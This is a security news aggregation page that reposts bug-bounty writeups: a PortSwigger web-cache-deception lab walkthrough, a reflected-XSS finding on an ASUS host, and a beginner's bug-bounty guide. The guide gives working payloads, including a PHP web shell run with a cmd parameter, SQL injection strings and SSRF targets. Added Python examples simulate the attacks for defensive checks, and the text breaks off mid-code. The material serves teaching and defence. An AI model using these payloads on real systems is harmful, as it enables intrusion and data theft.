This report presents statistics on PC threats for Q2 2024, including data on ransomware, miners, threats to macOS and IoT devices.
by Securelist
2024-09-03 08:00:46
IT threat evolution in Q2 2024. Mobile statistics
The report gives statistics on mobile malware and unwanted software for Q2 2024, including mobile banking Trojans and ransomware.
by Securelist
2024-09-03 08:00:08
IT threat evolution Q2 2024
In this report, Kaspersky researchers explore the most significant attacks of Q2 2024, including the XZ backdoor, the leaked LockBit builder, ShrinkLocker ransomware and others.
by Securelist
2024-09-03 07:28:00
Ex-Engineer Charged in Missouri for Failed $750,000 Bitcoin Extortion Attempt
A 57-year-old man from the U.S. state of Missouri has been arrested in connection with a failed data extortion campaign that targeted his former employer. Daniel Rhyne of Kansas City, Missouri, has been charged with one count of extortion in relation to a threat to cause damage to a protected computer, one count of intentional damage to a protected computer, and one count of wire fraud. He was
by The Hacker News
2024-09-03 06:45:41
CVE-2024-38063: Remote Kernel Exploitation via IPv6 in Windows
On August 13, 2024, Microsoft disclosed a critical vulnerability, CVE-2024-38063, as part of its Patch Tuesday updates [1], [2]. The flaw sits in the Windows TCP/IP network stack, the kernel component that implements the fundamental protocols used for connecting devices on the Internet and enabling services like the World Wide Web and email. With a CVSS score of 9.8 (Critical), it can be exploited remotely without authentication and has the potential to be "wormable", meaning it could spread across networks without requiring user interaction. CVE-2024-38063 allows attackers to execute arbitrary code remotely (RCE) on systems that have IPv6 enabled, which is the default setting on affected systems. It impacts a wide range of Windows operating systems, including Windows 10, Windows 11, and Windows Server versions from 2008 through 2022. Organizations are strongly advised to apply the update immediately to prevent the risk of exploitation.
by Picus Security
2024-09-03 00:00:00
When on Workstation, Do as the Local Browsers Do!
Introduction: Web browsers are common targets for many different APTs. Tools like Redline malware or penetration testing tools such as SharpChrome or SharpChromium steal sensitive data like cookies and saved login…
by TrustedSec
2024-09-02 23:00:00
Making progress on routing security: the new White House roadmap
On September 3, 2024, the White House published a report on Internet routing security. We'll talk about what that means and how you can help.
by Cloudflare
2024-09-02 22:21:34
Introducing Goffloader: A Pure Go Implementation of an In-Memory COFFLoader and PE Loader
We are excited to announce the release of Goffloader, a pure Go implementation of an in-memory COFFLoader and PE loader. This tool is designed to facilitate the easy execution of Cobalt Strike BOFs and unmanaged PE files directly in memory without writing any files to disk. Goffloader aims to take functionality that is conventionally within […]
by Praetorian
2024-09-02 21:31:55
Election security: how companies and federal agencies can protect the backbone of democracy
Realistic workforce exercises are key to implementing predictive defensive operations, raising the cost for adversaries to target and exploit vital infrastructures.
by Hack The Box Blog
2024-09-02 20:50:42
Industry Moves for the week of September 2, 2024 - SecurityWeek
Explore industry moves and significant changes in the industry for the week of September 2, 2024. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2024-09-02 19:03:00
RansomHub Ransomware Group Targets 210 Victims Across Critical Sectors
Threat actors linked to the RansomHub ransomware group encrypted and exfiltrated data from at least 210 victims since its inception in February 2024, the U.S. government said. The victims span various sectors, including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services,
by The Hacker News
2024-09-02 16:46:35
Owners of 1-Time Passcode Theft Service Plead Guilty
Three men in the United Kingdom have pleaded guilty to operating otp[.]agency, a once popular online service that helped attackers intercept the one-time passcodes (OTPs) that many websites require as a second authentication factor in addition to passwords. Launched in November 2019, OTP Agency was a service for intercepting one-time passwords needed to log in to various websites. Scammers would enter the target's phone number and name, and the service would initiate an automated phone call to the target that alerts them about unauthorized activity on their account.
by Krebs on Security
2024-09-02 16:17:24
Broadcom Unveils Major Updates to VMware Portfolio at Explore 2024
Broadcom is refocusing VMware as a private cloud technology, updating the company's core platforms for application delivery.
by ITPro Today
2024-09-02 15:44:30
Rise of Atomic Stealer signals a sea change in macOS malware
Atomic Stealer is the most popular malware-as-a-service on macOS because of highly active affiliate-driven distribution campaigns and constant feature upgrades.
by ThreatDown
2024-09-02 14:25:00
Webinar: Learn to Boost Cybersecurity with AI-Powered Vulnerability Management
The world of cybersecurity is in a constant state of flux. New vulnerabilities emerge daily, and attackers are becoming more sophisticated. In this high-stakes game, security leaders need every advantage they can get. That's where Artificial Intelligence (AI) comes in. AI isn't just a buzzword; it's a game-changer for vulnerability management. AI is poised to revolutionize vulnerability
by The Hacker News
2024-09-02 14:18:34
🍯 Bee-side 186 - Future-Proof Your Career in the Age of AGI
3 Bad Habits Holding You Back from Financial Freedom, Best Things at DEF CON 32, and more...
by Hive Five
2024-09-02 14:00:00
CrowdStrike faces onslaught of legal action from faulty software update
Even before Delta came forward, shareholders were looking for their pound of flesh, filing a class action lawsuit against CrowdStrike.
by TechCrunch
2024-09-02 13:00:00
Your Money or Your Data: Ransomware Readiness Planning
Today's blog installment brings us to the end of our 30-week journey that covered 30 cybersecurity topics that I felt would be of interest to a wide variety of security practitioners, such as Security Architects, Security Admins, and Security Auditors. I hope everyone found it as helpful as I found it to write.
by SpiderLabs Blog
2024-09-02 12:46:00
For Windows 11 setup, which user account type should you choose? How to decide
When you set up a new Windows PC, you can choose from up to four types of user accounts - but your first choice might not be the right one.
by ZDNET Security
2024-09-02 12:30:00
Next-Generation Attacks, Same Targets - How to Protect Your Users' Identities
The FBI and CISA Issue Joint Advisory on New Threats and How to Stop Ransomware. Note: on August 29, the FBI and CISA issued a joint advisory as part of their ongoing #StopRansomware effort to help organizations protect against ransomware. The latest advisory, AA24-242A, describes a new cybercriminal group and its attack methods. It also details three important actions to take today to mitigate
by The Hacker News
2024-09-02 11:52:57
Uncovering Critical Defensive Gaps with Automated Penetration Testing Software
Have you ever noticed that even the most impactful breaches often start with something as simple as a regular user being targeted through a phishing email or a weak password? From there, attackers methodically follow an attack path by dumping credentials, moving laterally across the network, escalating privileges, and eventually gaining domain administrator access. In other words, rather than relying on an extremely sophisticated single-shot technique, these attacks unfold like a domino effect, where each step paves the way for the next, leading to a full-scale compromise. This is precisely the kind of attack chain that Picus Attack Path Validation (APV), a cutting-edge automated penetration testing software, is designed to expose and validate, ensuring that these security vulnerabilities are identified before they can be exploited.
by Picus Security
2024-09-02 10:58:51
2nd September – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 26th August, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES: California-based Patelco Credit Union has confirmed a data breach after a ransomware attack that resulted in the exposure of sensitive personal information belonging to 726K clients and employees. The compromised data includes names, […]
by Check Point Research
2024-09-02 10:00:38
Spoofed GlobalProtect Used to Deliver Unique WikiLoader Variant
Unit 42 discusses WikiLoader malware spoofing GlobalProtect VPN, detailing evasion techniques, malicious URLs, and mitigation strategies.
by Palo Alto Networks - Unit42
2024-09-02 10:00:22
Head Mare: adventures of a unicorn in Russia and Belarus
Analysis of the hacktivist group Head Mare targeting companies in Russia and Belarus: exploitation of a WinRAR vulnerability, custom tools PhantomDL and PhantomCore.
by Securelist
2024-09-02 09:17:30
Myths and superstitions in the digital world | Kaspersky official blog
Even in 2024, the world is rife with digital paranoia and superstition. Find out if your smartphone really is spying on you, and why incognito mode doesn't make you invisible.
by Kaspersky
2024-09-02 09:06:00
Malicious npm Packages Mimicking 'noblox.js' Compromise Roblox Developers' Systems
Roblox developers are the target of a persistent campaign that seeks to compromise systems through bogus npm packages, once again underscoring how threat actors continue to exploit the trust in the open-source ecosystem to deliver malware. "By mimicking the popular 'noblox.js' library, attackers have published dozens of packages designed to steal sensitive data and compromise systems," Checkmarx
by The Hacker News
2024-09-02 09:05:00
The Gen Z Guide to Getting Ahead at Work
The evolving world of work can make it hard for young professionals in their first jobs. Here are expert tips to help you succeed.
by ITPro Today
2024-09-02 09:00:00
Embracing Neurodiversity in the IT Workplace to Bridge Talent Gaps
Leveraging the unique skills of neurodiverse individuals can help fill critical talent gaps in the workforce, particularly in IT, by fostering inclusive workplaces that recognize and support diverse cognitive abilities.
by ITPro Today
2024-09-02 08:12:41
A week in security (August 26 – September 1)
A list of topics we covered in the week of August 26 to September 1 of 2024.
by Malwarebytes Labs
2024-09-02 01:00:00
Ransomware Gangs Pummel Southeast Asia
Successful ransomware attacks against organizations in Asia continue at peak levels in 2024 following a wave of high-profile data breaches last year.
by Dark Reading
2024-09-01 19:12:28
Writeup: Path mapping for web cache deception @ PortSwigger Academy
APPRENTICE LAB

Before starting, configure FoxyProxy to send requests through Burp Suite. Keep 'Intercept' turned off in Burp Suite while FoxyProxy is active, so that all requests are logged in the HTTP history. Then log in to the application using the credentials wiener:peter. Note that the response will include your API key.

Go to Burp Suite Proxy > HTTP history, right-click the GET /my-account request and select Send to Repeater.

In the Repeater tab, modify the base path by adding an arbitrary segment; for example, change the path to /my-account/hanzala. Send the request and observe that you still receive a response containing your API key. This indicates that the origin server maps the URL path /my-account/<anything> back to /my-account. Also confirm that you receive a 200 response and that this request is not cached.

Add a static extension to the URL path, such as /my-account/hanzala.js, and send the request. Observe the response headers X-Cache: miss and Cache-Control: max-age=30:
X-Cache: miss – the response was not served from the cache.
Cache-Control: max-age=30 – if the response is cached, it should be stored for 30 seconds.

Resend the request within 30 seconds. The X-Cache header changes to hit, meaning the response was served from the cache. This shows that the cache has a caching rule for the .js extension and stores the response even though it contains user-specific data.

Now that we know the request is cached, let's create the exploit. In the browser, click Go to exploit server. In the Body section, craft an exploit that navigates the victim user carlos to the malicious URL you crafted earlier. Change the arbitrary path segment you added, so the victim doesn't receive your previously cached response. Click Deliver exploit to victim. When the victim views the exploit, the response they receive is stored in the cache.

<script>document.location="https://YOUR-LAB-ID.web-security-academy.net/my-account/hanzalaa.js"</script>

Back in Burp Suite, change the path to /my-account/hanzalaa.js. Since Carlos's response is stored in the cache, this request returns the same response. Send the request to retrieve Carlos's API key and copy it. Click Submit solution, then submit the API key for carlos to solve the lab.

We are done, great job everyone! 👏

Writeup: Path mapping for web cache deception @ PortSwigger Academy was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
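To see why the attack works and what actually closes it, here is the lab's path-mapping discrepancy replayed in memory. This is an added example, not code from the lab or from PortSwigger: the origin, the CDN-style cache, the two users and their API keys are constructed, and the cache's clock is a counter instead of real time. The origin has three constructed modes (the lenient mapping the writeup observes, the same mapping with the page marked no-store/private, and strict path matching that returns 404 for unknown sub-paths), and the cache can be told to honour or ignore the origin's Cache-Control. The practitioner's point it demonstrates: marking the page private is not enough on its own if the cache's static-extension rule overrides origin directives; the origin must stop mapping arbitrary sub-paths onto the account page, and the cache must obey no-store.

```python
"""Web cache deception via path mapping, replayed in memory. Added example,
not code from the lab or from PortSwigger: origin, cache, users and clock
are all constructed."""
import re

USERS = {"wiener": "wiener-key-1111", "carlos": "carlos-key-2222"}  # constructed
STATIC_EXT = re.compile(r"\.(?:js|css|png|jpg|gif|ico)$")


def origin(path, user, mode="lenient"):
    """Origin server in one of three constructed modes.

    lenient  the lab behaviour: /my-account/<anything> is mapped back onto
             /my-account and answered with the caller's key and max-age=30
    private  same path mapping, but the page is marked no-store, private
    strict   unknown sub-paths get 404; only /my-account itself exists
    """
    if mode == "strict":
        is_account = path == "/my-account"
    else:
        is_account = path == "/my-account" or path.startswith("/my-account/")
    if not is_account:
        return 404, {}, "not found"
    if user is None:
        return 302, {"Location": "/login"}, ""
    cache_control = "no-store, private" if mode == "private" else "max-age=30"
    return 200, {"Cache-Control": cache_control}, "API key: " + USERS[user]


class Cache:
    """CDN-style cache keyed on the path alone. It caches any 200 whose path
    ends in a static extension (the rule the writeup detects via X-Cache),
    using max-age when present and its own 30 s rule TTL otherwise.
    honor_origin=True makes it obey no-store/private from the origin."""

    RULE_TTL = 30

    def __init__(self, mode="lenient", honor_origin=False):
        self.mode = mode
        self.honor_origin = honor_origin
        self.store = {}
        self.now = 0  # constructed clock, advanced by tick()

    def tick(self, seconds):
        self.now += seconds

    def fetch(self, path, user):
        entry = self.store.get(path)
        if entry and entry["expires"] > self.now:
            return "hit", entry["body"]
        status, headers, body = origin(path, user, self.mode)
        cc = headers.get("Cache-Control", "")
        cacheable = status == 200 and STATIC_EXT.search(path) is not None
        if self.honor_origin and ("no-store" in cc or "private" in cc):
            cacheable = False
        if cacheable:
            m = re.search(r"max-age=(\d+)", cc)
            ttl = int(m.group(1)) if m else self.RULE_TTL
            self.store[path] = {"body": body, "expires": self.now + ttl}
        return "miss", body


def run_attack(cache):
    """Replays the writeup's steps. Returns (attacker's own key, cache state
    on the replay, what the unauthenticated attacker receives)."""
    # Discrepancy check: an arbitrary segment still returns the caller's key.
    _, own = cache.fetch("/my-account/hanzala", "wiener")
    # The victim is sent to a fresh segment with a static extension, so the
    # cache stores *their* response instead of serving the attacker's copy.
    victim_path = "/my-account/hanzalaa.js"
    cache.fetch(victim_path, "carlos")
    cache.tick(5)  # still inside the 30 s window
    state, leaked = cache.fetch(victim_path, None)  # attacker, no session
    return own, state, leaked


if __name__ == "__main__":
    print("lenient origin:", run_attack(Cache()))
    print("private page, cache ignores it:", run_attack(Cache("private")))
    print("private page, cache honours it:", run_attack(Cache("private", honor_origin=True)))
    print("strict origin:", run_attack(Cache("strict")))
```

Run it and the lenient case returns Carlos's key to an unauthenticated request with X-Cache semantics of hit; the private-but-ignored case still leaks, the private-and-honoured case and the strict-origin case do not. After the TTL passes the attacker only gets the login redirect, which is why the writeup stresses replaying within 30 seconds.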
by InfoSec Write-ups
2024-09-01 19:12:09
A Story About How I Found XSS in ASUS
A few months ago, during a routine security assessment, I uncovered a significant cross-site scripting (XSS) vulnerability in the Laravel Ignition debugging tool exposed on an ASUS host. This reflected XSS (R-XSS) posed a high risk due to the potential for unauthorized script execution in users' browsers. Here's how I discovered and explored this vulnerability.

The Discovery
While examining the target, I noticed that the Laravel Ignition debug mode was enabled on adam.asus.com, and the endpoint was vulnerable to XSS. The vulnerability was exposed through the following URL:
Vulnerable URL: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert('cappriciosec.com')%3E
When accessing this URL, the embedded script was executed in the user's browser, confirming the presence of an XSS vulnerability.

Understanding the Vulnerability
Bug Name: R-XSS (reflected XSS)
Bug Priority: High
Vulnerable URL: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert('cappriciosec.com')%3E

Impact
The impact of this XSS vulnerability depends on the application's context and the privileges of the compromised user. For example:
Minimal Impact: In applications with only public information, the impact might be negligible.
Serious Impact: In applications handling sensitive data, such as financial transactions or healthcare records, the impact could be severe, allowing unauthorized access to private information.
Critical Impact: If a user with elevated privileges is compromised, the attacker could gain full control of the application, affecting all users and data.

Steps to Reproduce
To confirm the vulnerability, follow these steps:
Access the Vulnerable URL: Open the URL in your browser: http://adam.asus.com/_ignition/scripts/--%3E%3Csvg%20onload=alert('cappriciosec.com')%3E
Observe the Script Execution: The script will execute in your browser, displaying an alert with the text cappriciosec.com.

Automating the Hunt
To streamline the process, I built a Python tool specifically for detecting this vulnerability. You can install it using pip and automate your testing:
Tool POC: laravel-ignition-rxss on GitHub
pip install laravel-ignition-rxss
laravel-ignition-rxss --chatid <YourTelegramChatID>
To check a single URL: laravel-ignition-rxss -u http://mytargetprogram.com
To check a list of URLs: laravel-ignition-rxss -i urls.txt

Remediation
To mitigate this vulnerability, disable debug mode by setting APP_DEBUG to false in the environment configuration. This removes the Ignition endpoints from the production site and prevents the reflected script from executing. Debug mode should never be left on for an internet-facing host; besides this reflection, it exposes stack traces and configuration details to anyone who triggers an error.

POC by: @karthithehacker
Mail: contact@karthithehacker.com
Website: https://www.karthithehacker.com/
If you're interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.
For enrolling in my cybersecurity and bug bounty course, WhatsApp +91 82709 13635.
Connect with me:
Twitter: https://twitter.com/karthithehacker
Instagram: https://www.instagram.com/karthithehacker/
LinkedIn: https://www.linkedin.com/in/karthikeyan--v/
Website: https://www.karthithehacker.com/
GitHub: https://github.com/karthi-the-hacker/
npmjs: https://www.npmjs.com/~karthithehacker
YouTube: https://www.youtube.com/@karthi_the_hacker
Thank you
Karthikeyan.V
A Story About How I Found XSS in ASUS was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
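The writeup confirms the bug by watching for an alert box. The check a practitioner wants to automate is the step before that: does the probe come back in the response body verbatim, HTML-entity-encoded, or percent-encoded? Only the first is worth confirming in a browser. The following is an added example, not the author's laravel-ignition-rxss tool and not Laravel Ignition's code. It uses two constructed page templates: a debug-style page that echoes a path segment inside an HTML comment (the leading "-->" in the writeup's payload is the kind of prefix used to break out of a comment, but that context is an assumption here, not something the writeup states), and a search page of the kind the beginner's guide further down this page tests with <script>alert('XSS')</script>. Each is rendered once unescaped and once through html.escape, and the classifier tells the two apart.

```python
"""Reflected-XSS reflection check. Added example; the renderers are
constructed stand-ins, not code from the ASUS writeup or from Laravel."""
import html
from urllib.parse import quote

# Constructed probes. COMMENT_PROBE mirrors the writeup's payload shape; the
# HTML-comment context it targets is an assumption of this example.
COMMENT_PROBE = "--><svg onload=alert(1)>"
SEARCH_PROBE = "<script>alert('XSS')</script>"

# Constructed templates standing in for the two pages discussed on this page.
DEBUG_TEMPLATE = "<!-- script: {} --><div>not found</div>"
SEARCH_TEMPLATE = "<p>Results for {}</p>"


def render_unescaped(template, value):
    """Vulnerable renderer: interpolates user input into the page verbatim."""
    return template.replace("{}", value)


def render_escaped(template, value):
    """Hardened renderer: HTML-entity-encodes the input first (quote=True so
    both quote characters are encoded as well)."""
    return template.replace("{}", html.escape(value, quote=True))


def classify_reflection(body, probe):
    """How did the probe come back in the response body?

    'raw'          verbatim, markup intact: an XSS candidate, confirm in a browser
    'escaped'      HTML-entity-encoded: reflected but neutralised in this context
    'url-encoded'  percent-encoded: reflected as text, no markup
    'none'         not reflected at all
    """
    if probe in body:
        return "raw"
    if html.escape(probe, quote=True) in body:
        return "escaped"
    if quote(probe, safe="") in body:
        return "url-encoded"
    return "none"


def check_endpoint(template, probe, escaped):
    """Render one constructed page with the probe and classify the reflection."""
    renderer = render_escaped if escaped else render_unescaped
    return classify_reflection(renderer(template, probe), probe)


if __name__ == "__main__":
    for name, tpl, probe in (("debug page", DEBUG_TEMPLATE, COMMENT_PROBE),
                             ("search page", SEARCH_TEMPLATE, SEARCH_PROBE)):
        print(name, "unescaped:", check_endpoint(tpl, probe, False),
              "escaped:", check_endpoint(tpl, probe, True))
```

Against a live target you would fetch the page with the probe in the path or query and pass the body to classify_reflection. A 'raw' result is only a candidate: the comment-context probe breaks out of "<!-- -->" but would be inert inside a <textarea> or a JavaScript string, so the browser check the writeup describes is still the confirmation step.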
by InfoSec Write-ups
2024-09-01 19:12:07
What is /etc/passwd group shadow file in Linux
Passwd is a file where information related to the user is stored, such as name, user id, group id, gecos field, home directory, and command…
by InfoSec Write-ups
2024-09-01 19:12:03
Understanding the Dark Web: Myths vs. Reality
by InfoSec Write-ups
2024-09-01 19:11:58
Unicast, Multicast, and Broadcast: Mastering Network Communication Essentials for Optimal…
Update on me
by InfoSec Write-ups
2024-09-01 19:11:55
AI-Driven Ghostwriter: The 2024 Ransomware That Knows You Better Than You Know Yourself
Problem:
by InfoSec Write-ups
2024-09-01 19:11:47
How to Get Started in Bug Bounty Hunting: A Comprehensive Beginner’s GuideIntroductionWelcome to the thrilling world of bug bounty hunting — where finding glitches in software is not just a hobby but a gateway to potential riches and recognition! Imagine being a digital detective, solving mysteries that most folks wouldn’t even notice, and getting rewarded for it. In this guide, we’ll unravel the basics of bug bounty hunting, give you a step-by-step walkthrough of unearthing common vulnerabilities, and share some nifty resources to get you started. Buckle up, it’s going to be a bug-tastic ride!What is Bug Bounty Hunting?Bug bounty hunting is like being a superhero in the realm of cybersecurity, but without the flashy suit. It involves sniffing out and reporting security vulnerabilities in systems, apps, or websites. Companies run bug bounty programs to lure ethical hackers (like you) into spotting and reporting these weak spots, which helps them beef up their security. In return, you get rewards, recognition, or at least a virtual high-five from the tech community.Step 1: Learn the Basics of Web SecurityBefore you start hunting bugs, you need to get comfy with the basics of web security. Think of it as learning the ABCs of cyber sleuthing.HTTP & HTTPS: These are like the postal services of the web. HTTP is the standard protocol, while HTTPS is its secure cousin that encrypts data between the browser and the server. Always go for HTTPS — it’s like wearing a seatbelt on the web.OWASP Top 10: This is your cheat sheet to the top 10 web security risks. 
Familiarize yourself with these troublemakers:SQL Injection (SQLi): When hackers play with your database like it’s a toy.Cross-Site Scripting (XSS): When bad scripts crash the party on your website.Broken Authentication: When your login system is as secure as a paper lock.Sensitive Data Exposure: When your private info goes public like it’s on a billboard.XML External Entities (XXE): When your XML files are sneaky troublemakers.Broken Access Control: When users access more than they should, like breaking into the VIP section.Security Misconfiguration: When your security settings are as mixed up as a puzzle.Cross-Site Request Forgery (CSRF): When attackers make your site do things it shouldn’t.Insecure Deserialization: When data being processed gets all messed up.Using Components with Known Vulnerabilities: When using outdated parts is like bringing a leaky bucket to the party.Networking Basics: Learn how IP addresses, DNS, and data travel over networks. It’s like understanding how letters get to your mailbox, but with a lot more technical mumbo jumbo.Step 2: Get Familiar with Tools of the TradeEvery superhero needs their gadgets, and for bug bounty hunting, you’ve got some cool tools:Burp Suite: Think of it as your magnifying glass for HTTP requests and responses. It’s powerful and comes in a community edition if you’re just starting out. Check out the Burp Suite Community Edition and Burp Suite Tutorial for Beginners.Nmap: Your go-to tool for scanning networks and discovering open ports. It’s like your radar for finding weak spots. Explore the Nmap Official Site and Nmap Tutorial for Beginners.OWASP ZAP: An open-source security scanner that helps you spot vulnerabilities. It’s like having a sidekick that never sleeps. Check out the OWASP ZAP Official Site and the OWASP ZAP User Guide.Google Dorking: Use advanced search operators to dig up information exposed on the internet. It’s like using a super-powered search engine to find hidden gems. 
Read up on Google Dorking Guide.Step 3: Choose a Bug Bounty PlatformNow, where do you actually hunt these bugs? Here are some platforms where you can get started:HackerOne: The big leagues with programs from major companies. Check out HackerOne and their Beginner’s Guide.Bugcrowd: Another top platform with various programs to explore. Visit Bugcrowd and Bugcrowd University.Synack: A more exclusive platform with an application process. Head over to Synack if you’re feeling fancy.Open Bug Bounty: Focuses on responsible disclosure even if you don’t have a formal program. Check out Open Bug Bounty.Step 4: Finding Vulnerabilities — Step-by-Step ExamplesLet’s put on our detective hats and dive into some classic vulnerabilities:Example 1: Cross-Site Scripting (XSS)XSS is like a prankster who injects malicious scripts into web pages. Here’s how to catch them:Identify Input Fields: Look for places where you can type stuff — search boxes, comment sections, or profiles.Inject Test Script: Drop a simple script like:<script>alert(''XSS'')</script>into the input field and hit submit.Check for Execution: If you see an alert box popping up, you’ve found an XSS vulnerability. Congrats!Report the Vulnerability: Describe your findings in a report — explain how you did it, the impact, and offer suggestions for fixing it. It’s like writing a detective’s report.Example: Testing a search fieldEnter <script>alert(''Test'')</script> in the search box.If an alert box appears, it’s an XSS vulnerability.Example 2: Remote Code Execution (RCE)RCE is when hackers can run commands on a server from afar. Here’s how to find it:Find User Input: Look for places where users can upload files or enter commands.Test File Uploads: Upload a file with an extension for executable code, like .php or .asp. Try this payload:<?php system($_GET[''cmd'']); ?>Execute Command: Access the uploaded file via the web and pass a command using URL parameters. 
For example: http://example.com/uploads/yourfile.php?cmd=lsObserve Output: If the command runs and you see the output, the server is vulnerable to RCE.Report the Vulnerability: Detail how you uploaded the file, executed the command, and the potential impacts.Example: Upload a PHP fileUpload a file named shell.php with the content <?php phpinfo(); ?>.Access it via http://example.com/uploads/shell.php to see if it executes.Example 3: Server-Side Request Forgery (SSRF)SSRF is when an attacker tricks the server into making requests to internal resources. Here’s how to sniff it out:Identify URL Parameters: Look for parameters that accept URLs or IP addresses.Inject Malicious URL: Test with URLs pointing to internal resources, like:http://localhost/admin http://127.0.0.1Observe Response: Check if the server returns data from the internal URL.Report the Vulnerability: Explain how you injected the URL, the responses you observed, and potential impacts.Example: Manipulate a URL parameterChange a parameter like http://example.com/fetch?url=http://localhost to other internal addresses.Example 4: SQL Injection (SQLi)SQL Injection (SQLi) involves injecting malicious SQL queries into an application to manipulate the database. Here’s how to test for SQLi:Identify Input Fields: Find fields where you can input data that interacts with a database, such as login forms or search bars.Inject SQL Payload: Use SQL injection payloads to test the input fields. For example:'' OR ''1''=''1Observe Response: If the application returns unexpected results or database errors, it may be vulnerable to SQLi.Report the Vulnerability: Provide details of the injection, the responses, and potential impacts.Example: Testing a login form:Enter admin'' OR ''1''=''1 as the username and password. 
If it logs you in, the site is vulnerable.Step 5: Learn From the CommunityEngaging with the bug bounty community can enhance your skills and knowledge:Write-Ups: Reading write-ups from experienced hunters can provide insights into different techniques and approaches. Websites like Hack The Box Write-Ups offer valuable information.Forums and Discord Channels: Join forums and Discord channels for bug bounty hunters. These platforms are great for asking questions and sharing knowledge.Bugcrowd ForumHackerOne CommunityBlogs and Videos: Follow cybersecurity blogs and YouTube channels for updates and tutorials.Security WeeklyThe Bug Bounty HubLiveOverflow’s YouTube ChannelAdditional Tips for Bug Bounty HuntingUnderstand the Scope: Each bug bounty program has a defined scope that specifies which applications, domains, or functionalities are in scope for testing. Always read and follow the program’s rules to avoid testing unauthorized areas.HackerOne Scope Policy2. Stay Updated: The cybersecurity landscape is always evolving. Keep up with the latest vulnerabilities, tools, and techniques by following industry news and updates.CVE DetailsExploit Database3. Practice Ethically: Always use your skills responsibly. Respect the rules of each bug bounty program and avoid causing harm to systems or users.4. Document Everything: Keep detailed records of your findings, including the steps to reproduce the vulnerability, the impact, and any mitigation advice. This will help you write better reports and communicate effectively with program managers.5. Use Automation Wisely: While automated tools can help identify vulnerabilities, manual testing is crucial for discovering complex issues. 
Use automation as a supplement, not a replacement for manual analysis.Example Scenarios: Bug Bounty Hunting in ActionScenario 1: Finding XSS on a Search PageStep-by-Step Example:Navigate to the Search Page: Open the search page of the target application.Test Input Fields: In the search box, input <script>alert(''XSS'')</script>.Submit and Observe: Click the search button and observe if an alert box pops up.Verify and Report: If the script executes, it indicates an XSS vulnerability. Write a report detailing the affected URL, the payload used, and the impact.Scenario 2: Exploiting RCE via File UploadStep-by-Step Example:Locate File Upload Functionality: Find a section of the application that allows file uploads, such as an avatar or document upload feature.Prepare Malicious File: Create a PHP file with the following content:<?php system($_GET[''cmd'']); ?>Upload the File: Upload the PHP file to the server.Access the File: Visit the file via URL, e.g., http://example.com/uploads/malicious.php?cmd=ls, to execute a command.Verify Execution: If you see the output of the command, the server is vulnerable to RCE. 
Report the issue with details on the file upload process and the commands executed.

Scenario 3: Exploiting SSRF via URL Parameter
Step-by-Step Example:
Find URL Parameter: Look for a parameter that makes the server fetch a URL on your behalf, such as a webhook, an image import, or a "fetch by URL" feature.
Inject Internal URLs: Enter URLs like http://localhost/admin or http://127.0.0.1 in the parameter. Compare the response with the one you get for a URL you control and for an unreachable address: differences in status code, body, or response time show the server is making the request even when it never returns the body (a blind SSRF).
Check Responses: Observe if the application returns information from the internal URL or service. On cloud-hosted targets the instance metadata service (169.254.169.254) is the classic high-impact destination; showing that it is reachable is enough, do not pull credentials from it.
Report the Vulnerability: Document the URL parameter, the injected payloads, and the responses.

Scenario 4: SQL Injection in Login Form
Step-by-Step Example:
Locate Login Form: Find the login form on the target website.
Inject SQL Payload: Enter admin' OR '1'='1 as both username and password. If the application concatenates the input into its query, the WHERE clause becomes username = 'admin' OR '1'='1' AND password = 'admin' OR '1'='1', which is true for every row.
Submit the Form: Click login and see if you gain unauthorized access. Logging in is the proof; do not browse the account or its data afterwards.
Document and Report: If successful, report the SQL injection with details on the payload and its effect, and recommend parameterized queries as the fix.

Links and Resources

Learning Platforms and Tutorials
Hacker101: Hacker101 — Free Online Security Training
PortSwigger Web Security Academy: Learn Web Security for Free
Bugcrowd University: Free Bug Bounty Training
OWASP (Open Web Application Security Project): OWASP Resources

Practice Platforms
Hack The Box: Hack The Box — Practice Cybersecurity
TryHackMe: TryHackMe — Learn Cybersecurity
VulnHub: VulnHub — Vulnerable By Design
CTFtime: Capture The Flag Events

Bug Bounty Programs and Platforms
HackerOne: HackerOne — Bug Bounty Platform
Bugcrowd: Bugcrowd — Find and Report Bugs
Synack: Synack — Managed Bug Bounty
Cobalt: Cobalt — Pentesting as a Service

Tools and Resources
Burp Suite: Burp Suite — Web Vulnerability Scanner
OWASP ZAP (Zed Attack Proxy): OWASP ZAP — Free Security Scanner
Nmap: Nmap — Network Scanner
Nikto: Nikto — Web Server Scanner

Learning and Community
The Hacker News: Stay Updated on Security News
Krebs on Security: Krebs on Security Blog
Reddit — NetSec: NetSec Subreddit
Twitter — Follow Security Experts: List of Security Experts on Twitter

Documentation and Reporting
Exploit-DB: Exploit Database — Exploits and Vulnerabilities
CVE Details: CVE Details — Vulnerability Database
Security Focus: Security Focus — Vulnerability Database

Conclusion
Bug bounty hunting is like a fun treasure hunt for finding security flaws on the web. It’s exciting and can be super rewarding if you play by the rules, keep good notes, and use your tools wisely. Imagine yourself as a superhero saving the day, but instead of a cape, you’ve got a keyboard. Keep your adventures ethical, document your discoveries like a treasure map, and use automation as your trusty sidekick, not your only tool. Happy hunting, and may you find bugs that are as elusive as a needle in a haystack! 🚀💻🔍

For further learning and practice:
Bug Bounty Tutorials: Hacker101
CTF Platforms: Hack The Box, TryHackMe
Cybersecurity Blogs: The Hacker News, Krebs on Security

Thank you for reading, and happy hunting! 🚀💻🔍
— Subham

How to Get Started in Bug Bounty Hunting: A Comprehensive Beginner’s Guide was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
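For Scenario 3, the fix a report should recommend is a check on where the fetched URL actually leads before the server connects. The following Python validator is an added example and is not code from the original guide or from any program mentioned in it. It rejects non-HTTP schemes and userinfo in the URL, resolves the hostname, and refuses any host that has a loopback, private, link-local, multicast, reserved or IPv4-mapped address, so http://localhost/admin, http://127.0.0.1 and the 169.254.169.254 metadata endpoint are all blocked. The hostnames in CONSTRUCTED_DNS are invented so the script runs offline; real_resolver uses live DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

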